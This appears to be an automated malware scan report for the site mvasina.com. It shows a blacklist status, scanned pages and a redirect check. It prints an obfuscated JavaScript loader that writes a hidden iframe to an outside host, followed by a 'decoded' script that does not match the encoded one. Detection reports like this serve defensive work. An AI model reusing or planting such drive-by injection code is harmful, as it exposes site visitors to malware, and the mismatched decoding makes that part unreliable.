Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mvasina.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mvasina.com/ | 200 OK Content-Length: 2972 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!39!104!116!116!112!58!47!47!107!108!105!114!101!115!117!116!101!107!46!99!111!109!47!98!117!98!117!46!104!116!109!108!39!32!119!105!100!116!104!61!39!48!39!32!104!101!105!103!104!116!61!39!48!39!32!115!116!121!108!101!61!39!118!105!115!105!98!105!108!105!116!121!58!32!104!105!100!100!101!110!59!39!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);
Decoded script:
window.status='Done';document.write('<iframe name=00a4 src=\'http://gerbalaif.info/stds/index.php?'+Math.round(Math.random()*52440)+'5cf745fd374\' width=138 height=380 style=\'display: none\'></iframe>')
<iframe name=00a4 src='http://gerbalaif.info/stds/index.php?336645cf745fd374' width=138 height=380 style='display: none'></iframe>
Antivirus reports:
http://mvasina.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mvasina.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Thu, 28 Aug 2014 07:54:20 GMT
Accept-Ranges: bytes
ETag: "af6e4d-b9c-43dc149ae8840"
Server: Apache
Content-Length: 2972
Content-Type: text/html; charset=windows-1251
Expires: Thu, 28 Aug 2014 07:54:20 GMT
Last-Modified: Wed, 31 Oct 2007 03:11:21 GMT
...2972 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mvasina.com
Referer: http://www.google.com/search?q=mvasina.com
Result:
The result is similar to the first query. There are no suspicious redirects found.